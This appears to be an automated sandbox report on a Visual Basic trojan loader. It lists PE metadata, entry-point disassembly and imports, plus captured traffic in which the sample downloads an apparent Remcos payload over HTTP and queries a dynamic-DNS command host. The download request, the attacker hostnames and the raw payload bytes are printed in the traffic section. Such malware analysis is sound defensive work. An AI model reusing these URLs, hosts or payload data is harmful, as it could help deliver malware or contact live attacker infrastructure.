                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                DLL Characteristics:
                Time Stamp:0x5A3E9E30 [Sat Dec 23 18:19:28 2017 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:20511f60b3c62ae145d60c4c066b22a5

                Entrypoint Preview

                Instruction
                push 00401D68h
                call 00007F430CA36443h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                xor byte ptr [eax], al
                add byte ptr [eax], al
                inc eax
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add al, dh
                into
                xchg eax, ebp
                xchg dword ptr [esi-7Ah], eax
                into
                dec esi
                lahf
                jnbe 00007F430CA36446h
                loop 00007F430CA3647Ah
                sbb byte ptr [esi+0000005Fh], cl
                add byte ptr [eax], al
                add byte ptr [ecx], al
                add byte ptr [eax], al
                add byte ptr [edx], al
                add edi, dword ptr [eax]
                or byte ptr [ecx+00h], al
                push eax
                popad
                outsb
                popad
                insd
                popad
                outsb
                jnc 00007F430CA364BDh
                cmp byte ptr [eax], al
                add eax, dword ptr [eax]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add bh, bh
                int3
                xor dword ptr [eax], eax
                add bh, al
                shr byte ptr [ecx], 1
                or al, byte ptr [ecx-48BA903Bh]
                int1
                mov eax, dword ptr [5110246Bh]
                test eax, 7561C1ECh
                and byte ptr [ebx+eax*8], dl
                inc edx
                lahf
                leave
                ror dword ptr [edi+585AC9C0h], 1
                cmp cl, byte ptr [edi-53h]
                xor ebx, dword ptr [ecx-48EE309Ah]
                or al, 00h
                stosb
                add byte ptr [eax-2Dh], ah
                xchg eax, ebx
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                test dword ptr [esi], eax
                add byte ptr [eax], al
                add byte ptr [esi], 00000000h
                add byte ptr [eax], al
                or eax, 52455600h
                push ebx
                inc ebp
                push edx
                dec ecx
                dec esi
                inc edi
                inc ebp
                push edx
                dec esi
                inc ebp
                add byte ptr [47000501h], cl

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x185740x28.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1b0000x9c8.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x17c380x18000False0.469492594401data6.6051840279IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .data0x190000x121c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .rsrc0x1b0000x9c80x1000False0.227294921875data2.1041800969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_ICON0x1b6e00x2e8data
                RT_ICON0x1b4f80x1e8data
                RT_ICON0x1b3d00x128GLS_BINARY_LSB_FIRST
                RT_GROUP_ICON0x1b3a00x30data
                RT_VERSION0x1b1500x250dataEnglishUnited States

                Imports

                DLLImport
                MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaInStr, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaStrComp, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                Version Infos

                DescriptionData
                Translation0x0409 0x04b0
                InternalNameCamases3
                FileVersion1.00
                CompanyNameMarbleStone
                CommentsMarbleStone
                ProductNamePanamansk8
                ProductVersion1.00
                OriginalFilenameCamases3.exe

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jun 7, 2021 20:43:35.189440966 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.354955912 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.355103970 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.357248068 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.527606010 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.553634882 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.553683043 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.553711891 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.553736925 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.553750992 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.553765059 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.553795099 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.553821087 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.553843975 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.553863049 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.553868055 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.553869963 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.553870916 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.553894043 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.553936958 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.553940058 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.553941965 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.717907906 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.717950106 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.717978001 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718003988 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718030930 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718058109 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718067884 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718081951 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718086004 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718089104 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718120098 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718147039 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718152046 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718156099 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718173027 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718199968 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718216896 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718221903 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718224049 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718225956 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718251944 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718277931 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718290091 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718295097 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718297958 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718308926 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718338013 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718364000 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718374968 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718379021 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718381882 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718389034 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718415022 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718441010 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.718461037 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718465090 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.718466997 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.721843958 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894362926 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894419909 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894452095 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894478083 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894494057 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894504070 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894530058 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894556046 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894581079 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894603014 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894608021 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894613028 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894614935 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894633055 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894656897 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894680023 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894702911 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894725084 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894730091 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894735098 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894737005 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894750118 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894773960 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894797087 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894821882 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894833088 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894838095 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894840956 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894846916 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894869089 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894891977 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894903898 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894907951 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894916058 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894918919 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894939899 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894957066 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894961119 CEST4973280192.168.2.6192.185.113.219
                Jun 7, 2021 20:43:35.894963026 CEST8049732192.185.113.219192.168.2.6
                Jun 7, 2021 20:43:35.894989967 CEST8049732192.185.113.219192.168.2.6

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jun 7, 2021 20:42:27.059772968 CEST6426753192.168.2.68.8.8.8
                Jun 7, 2021 20:42:27.103975058 CEST53642678.8.8.8192.168.2.6
                Jun 7, 2021 20:42:28.126388073 CEST4944853192.168.2.68.8.8.8
                Jun 7, 2021 20:42:28.170967102 CEST53494488.8.8.8192.168.2.6
                Jun 7, 2021 20:42:29.056590080 CEST6034253192.168.2.68.8.8.8
                Jun 7, 2021 20:42:29.100231886 CEST53603428.8.8.8192.168.2.6
                Jun 7, 2021 20:42:30.134119034 CEST6134653192.168.2.68.8.8.8
                Jun 7, 2021 20:42:30.176605940 CEST53613468.8.8.8192.168.2.6
                Jun 7, 2021 20:42:31.448030949 CEST5177453192.168.2.68.8.8.8
                Jun 7, 2021 20:42:31.490524054 CEST53517748.8.8.8192.168.2.6
                Jun 7, 2021 20:42:32.434293032 CEST5602353192.168.2.68.8.8.8
                Jun 7, 2021 20:42:32.477134943 CEST53560238.8.8.8192.168.2.6
                Jun 7, 2021 20:42:33.460597992 CEST5838453192.168.2.68.8.8.8
                Jun 7, 2021 20:42:33.503323078 CEST53583848.8.8.8192.168.2.6
                Jun 7, 2021 20:42:34.419742107 CEST6026153192.168.2.68.8.8.8
                Jun 7, 2021 20:42:34.462224960 CEST53602618.8.8.8192.168.2.6
                Jun 7, 2021 20:42:35.367039919 CEST5606153192.168.2.68.8.8.8
                Jun 7, 2021 20:42:35.409394979 CEST53560618.8.8.8192.168.2.6
                Jun 7, 2021 20:42:37.839397907 CEST5833653192.168.2.68.8.8.8
                Jun 7, 2021 20:42:37.881587029 CEST53583368.8.8.8192.168.2.6
                Jun 7, 2021 20:42:38.976092100 CEST5378153192.168.2.68.8.8.8
                Jun 7, 2021 20:42:39.020881891 CEST53537818.8.8.8192.168.2.6
                Jun 7, 2021 20:42:40.216075897 CEST5406453192.168.2.68.8.8.8
                Jun 7, 2021 20:42:40.259056091 CEST53540648.8.8.8192.168.2.6
                Jun 7, 2021 20:42:41.320555925 CEST5281153192.168.2.68.8.8.8
                Jun 7, 2021 20:42:41.362912893 CEST53528118.8.8.8192.168.2.6
                Jun 7, 2021 20:42:42.368067980 CEST5529953192.168.2.68.8.8.8
                Jun 7, 2021 20:42:42.410609007 CEST53552998.8.8.8192.168.2.6
                Jun 7, 2021 20:42:43.526990891 CEST6374553192.168.2.68.8.8.8
                Jun 7, 2021 20:42:43.570085049 CEST53637458.8.8.8192.168.2.6
                Jun 7, 2021 20:42:44.783766985 CEST5005553192.168.2.68.8.8.8
                Jun 7, 2021 20:42:44.828049898 CEST53500558.8.8.8192.168.2.6
                Jun 7, 2021 20:42:46.033189058 CEST6137453192.168.2.68.8.8.8
                Jun 7, 2021 20:42:46.075520039 CEST53613748.8.8.8192.168.2.6
                Jun 7, 2021 20:42:47.285466909 CEST5033953192.168.2.68.8.8.8
                Jun 7, 2021 20:42:47.328111887 CEST53503398.8.8.8192.168.2.6
                Jun 7, 2021 20:42:48.417357922 CEST6330753192.168.2.68.8.8.8
                Jun 7, 2021 20:42:48.460304976 CEST53633078.8.8.8192.168.2.6
                Jun 7, 2021 20:43:00.354979992 CEST4969453192.168.2.68.8.8.8
                Jun 7, 2021 20:43:00.407907963 CEST53496948.8.8.8192.168.2.6
                Jun 7, 2021 20:43:22.286176920 CEST5498253192.168.2.68.8.8.8
                Jun 7, 2021 20:43:22.330776930 CEST53549828.8.8.8192.168.2.6
                Jun 7, 2021 20:43:33.364975929 CEST5001053192.168.2.68.8.8.8
                Jun 7, 2021 20:43:33.458831072 CEST53500108.8.8.8192.168.2.6
                Jun 7, 2021 20:43:34.407449961 CEST6371853192.168.2.68.8.8.8
                Jun 7, 2021 20:43:34.530824900 CEST53637188.8.8.8192.168.2.6
                Jun 7, 2021 20:43:35.098205090 CEST6211653192.168.2.68.8.8.8
                Jun 7, 2021 20:43:35.141453981 CEST53621168.8.8.8192.168.2.6
                Jun 7, 2021 20:43:35.168903112 CEST6381653192.168.2.68.8.8.8
                Jun 7, 2021 20:43:35.268287897 CEST53638168.8.8.8192.168.2.6
                Jun 7, 2021 20:43:35.776992083 CEST5501453192.168.2.68.8.8.8
                Jun 7, 2021 20:43:35.819999933 CEST53550148.8.8.8192.168.2.6
                Jun 7, 2021 20:43:36.431745052 CEST6220853192.168.2.68.8.8.8
                Jun 7, 2021 20:43:36.565550089 CEST53622088.8.8.8192.168.2.6
                Jun 7, 2021 20:43:37.215694904 CEST5757453192.168.2.68.8.8.8
                Jun 7, 2021 20:43:37.259170055 CEST53575748.8.8.8192.168.2.6
                Jun 7, 2021 20:43:37.349425077 CEST5181853192.168.2.68.8.8.8
                Jun 7, 2021 20:43:37.402235985 CEST53518188.8.8.8192.168.2.6
                Jun 7, 2021 20:43:37.729406118 CEST5662853192.168.2.68.8.8.8
                Jun 7, 2021 20:43:37.829976082 CEST53566288.8.8.8192.168.2.6
                Jun 7, 2021 20:43:38.589009047 CEST6077853192.168.2.68.8.8.8
                Jun 7, 2021 20:43:38.633724928 CEST53607788.8.8.8192.168.2.6
                Jun 7, 2021 20:43:39.739865065 CEST5379953192.168.2.68.8.8.8
                Jun 7, 2021 20:43:39.784301043 CEST53537998.8.8.8192.168.2.6
                Jun 7, 2021 20:43:40.892893076 CEST5468353192.168.2.68.8.8.8
                Jun 7, 2021 20:43:40.976972103 CEST53546838.8.8.8192.168.2.6
                Jun 7, 2021 20:43:42.672722101 CEST5932953192.168.2.68.8.8.8
                Jun 7, 2021 20:43:42.717361927 CEST53593298.8.8.8192.168.2.6
                Jun 7, 2021 20:44:13.445609093 CEST6402153192.168.2.68.8.8.8
                Jun 7, 2021 20:44:13.505254030 CEST53640218.8.8.8192.168.2.6
                Jun 7, 2021 20:45:07.588278055 CEST5612953192.168.2.68.8.8.8
                Jun 7, 2021 20:45:07.758765936 CEST53561298.8.8.8192.168.2.6
                Jun 7, 2021 20:45:07.818758011 CEST5817753192.168.2.68.8.8.8
                Jun 7, 2021 20:45:07.863574028 CEST53581778.8.8.8192.168.2.6
                Jun 7, 2021 20:45:09.373864889 CEST5070053192.168.2.68.8.8.8
                Jun 7, 2021 20:45:09.424510956 CEST53507008.8.8.8192.168.2.6
                Jun 7, 2021 20:45:19.333503008 CEST5406953192.168.2.68.8.8.8
                Jun 7, 2021 20:45:19.376274109 CEST53540698.8.8.8192.168.2.6
                Jun 7, 2021 20:45:31.601393938 CEST6117853192.168.2.68.8.8.8
                Jun 7, 2021 20:45:31.667457104 CEST53611788.8.8.8192.168.2.6
                Jun 7, 2021 20:45:53.789323092 CEST5701753192.168.2.68.8.8.8
                Jun 7, 2021 20:45:53.833571911 CEST53570178.8.8.8192.168.2.6
                Jun 7, 2021 20:46:15.892798901 CEST5632753192.168.2.68.8.8.8
                Jun 7, 2021 20:46:16.001064062 CEST53563278.8.8.8192.168.2.6
                Jun 7, 2021 20:46:38.136794090 CEST5024353192.168.2.68.8.8.8
                Jun 7, 2021 20:46:38.179811001 CEST53502438.8.8.8192.168.2.6

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Jun 7, 2021 20:43:35.098205090 CEST192.168.2.68.8.8.80x5409Standard query (0)ztechinternational.comA (IP address)IN (0x0001)
                Jun 7, 2021 20:45:07.588278055 CEST192.168.2.68.8.8.80x9beeStandard query (0)ztechinternational.comA (IP address)IN (0x0001)
                Jun 7, 2021 20:45:07.818758011 CEST192.168.2.68.8.8.80xb3e7Standard query (0)ztechinternational.comA (IP address)IN (0x0001)
                Jun 7, 2021 20:45:09.373864889 CEST192.168.2.68.8.8.80xda30Standard query (0)hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.euA (IP address)IN (0x0001)
                Jun 7, 2021 20:45:19.333503008 CEST192.168.2.68.8.8.80xb1baStandard query (0)ztechinternational.comA (IP address)IN (0x0001)
                Jun 7, 2021 20:45:31.601393938 CEST192.168.2.68.8.8.80x6ccStandard query (0)hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.euA (IP address)IN (0x0001)
                Jun 7, 2021 20:45:53.789323092 CEST192.168.2.68.8.8.80x9d50Standard query (0)hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.euA (IP address)IN (0x0001)
                Jun 7, 2021 20:46:15.892798901 CEST192.168.2.68.8.8.80x49f3Standard query (0)hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.euA (IP address)IN (0x0001)
                Jun 7, 2021 20:46:38.136794090 CEST192.168.2.68.8.8.80x8b5cStandard query (0)hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.euA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Jun 7, 2021 20:43:35.141453981 CEST8.8.8.8192.168.2.60x5409No error (0)ztechinternational.com192.185.113.219A (IP address)IN (0x0001)
                Jun 7, 2021 20:45:07.758765936 CEST8.8.8.8192.168.2.60x9beeNo error (0)ztechinternational.com192.185.113.219A (IP address)IN (0x0001)
                Jun 7, 2021 20:45:07.863574028 CEST8.8.8.8192.168.2.60xb3e7No error (0)ztechinternational.com192.185.113.219A (IP address)IN (0x0001)
                Jun 7, 2021 20:45:09.424510956 CEST8.8.8.8192.168.2.60xda30No error (0)hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu172.94.125.152A (IP address)IN (0x0001)
                Jun 7, 2021 20:45:19.376274109 CEST8.8.8.8192.168.2.60xb1baNo error (0)ztechinternational.com192.185.113.219A (IP address)IN (0x0001)
                Jun 7, 2021 20:45:31.667457104 CEST8.8.8.8192.168.2.60x6ccNo error (0)hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu172.94.125.152A (IP address)IN (0x0001)
                Jun 7, 2021 20:45:53.833571911 CEST8.8.8.8192.168.2.60x9d50No error (0)hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu172.94.125.152A (IP address)IN (0x0001)
                Jun 7, 2021 20:46:16.001064062 CEST8.8.8.8192.168.2.60x49f3No error (0)hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu172.94.125.152A (IP address)IN (0x0001)
                Jun 7, 2021 20:46:38.179811001 CEST8.8.8.8192.168.2.60x8b5cNo error (0)hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu172.94.125.152A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • ztechinternational.com

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.649732192.185.113.21980C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                TimestampkBytes transferredDirectionData
                Jun 7, 2021 20:43:35.357248068 CEST1403OUTGET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: ztechinternational.com
                Cache-Control: no-cache
                Jun 7, 2021 20:43:35.553634882 CEST1412INHTTP/1.1 200 OK
                Date: Mon, 07 Jun 2021 18:43:35 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade
                Last-Modified: Sun, 06 Jun 2021 21:56:00 GMT
                Accept-Ranges: bytes
                Content-Length: 131136
                Content-Type: application/octet-stream
                Data Raw: 50 2c b3 d2 5c 70 c4 73 b1 00 63 3a 7f 34 b0 da 59 59 73 a7 a2 aa d4 09 01 d4 f5 b0 f1 99 d5 8a e3 7f 62 2a 08 44 a5 2b 07 cf 73 d0 22 fa 29 cf ca f9 ec 43 ea 15 dc d9 72 c3 ae e4 a5 7b b5 2d 3f 6e 4a fa 24 28 dc 55 24 9e ab 9b 90 1b 23 fb 58 ec 8a 60 6e 54 94 7f 98 6b f0 7a f0 0b d8 28 78 c9 a8 b4 55 5b cf c4 22 ff 29 62 94 71 45 b1 99 e8 60 8d b6 27 bd dc 32 03 4f 47 48 19 ef 15 d0 cc 4e 4b 62 f2 7d a7 50 40 5a 8d 59 e2 94 eb 3c 19 ab 57 fa f7 a3 cb 61 91 c7 ee ee 29 a2 ab 70 e7 dc 27 2c e7 ba 4f c7 9d d9 cd 22 fd 92 64 1c 67 1d 42 27 f1 76 24 c3 83 93 5a 16 5f 35 fe 24 35 d1 d5 50 df 36 6f 3a 5d fc 04 44 fa 9d ae 75 35 e4 c3 6e 2e c2 7f 16 56 1f 5b 92 c5 65 1a 02 1f ef 25 4e 2d fe 5b d0 8a 65 59 5e 74 95 e8 d3 a2 a6 cb 9f 6d 8e c6 f9 9c a1 7c 68 3b 0a 7a b2 98 44 da 98 a5 32 53 a5 d7 c3 84 38 a2 5d 1b 89 09 1d 32 9d 56 31 cd 51 4c 75 99 1e 20 e2 8e 9d 47 29 61 db 91 43 dd 35 6a c2 9d ba 20 2b 50 fb 9b 79 c2 a9 09 2f bc bb eb 2c 94 09 4d 03 2e 9e 6b c5 c0 10 be 94 8c f9 e3 b6 4b f1 8d 20 af 7c 90 9c c7 a7 22 4a eb 63 0b 66 df 14 93 e1 c7 5a f0 0c c1 a9 e5 f2 35 b1 3d 49 0e e3 4e ea d1 35 4d 6a 64 e3 dc 5a 41 3f 06 33 ac 53 14 bf 79 ca 85 c1 69 74 66 5c d7 f2 90 ff 67 14 2f e9 c1 7f 7b f1 b0 c9 06 2b db ba 6d 66 e2 fd b3 22 37 8e 0e 0a 4f 89 fd 1f f9 70 5e 15 58 f5 40 96 2f 59 7a 14 cf 2b 2a d9 ea 31 2f bc ee dc ec 41 22 1e 59 ef 71 1a 71 74 e0 c5 ef 58 b9 93 63 71 8e ee d3 89 64 83 49 59 3f 55 1f 89 75 59 23 83 6c b4 ab cd e8 9e 02 63 33 cf fd 77 e9 a9 27 06 5d 4b af b2 6f 78 44 ab 85 98 45 ab 75 6f 8f ba f2 a8 84 13 77 ab 2b 14 68 61 cc ad bb 31 17 6e 32 d0 6f 82 87 4f 7f 09 a3 56 7d 95 fb f6 bb b8 da 27 38 52 8b cc 26 9b 8a c3 00 43 cb a0 58 3c 4c 65 b4 de f4 c3 55 75 fd 2c 5e 3e 5d b1 6c 97 44 b2 d4 b1 0d 02 43 fd 5e cb 0a e8 63 8c b0 4b 67 71 fb a7 a5 5b cf 6e d1 9e 63 65 ee 75 b3 79 d1 29 ea c7 b7 bb 88 ed ea 7e 98 f1 10 d8 af 11 e3 e0 79 60 6b 57 95 21 17 e8 0a 20 bc 47 94 e5 ef 81 ee a3 73 45 03 6d 98 74 5f 48 ca a8 4a 84 dc e3 c3 60 0a 16 c7 46 6d 2c 3d cb e3 85 c5 50 e9 42 92 66 66 dc bf f0 6f e0 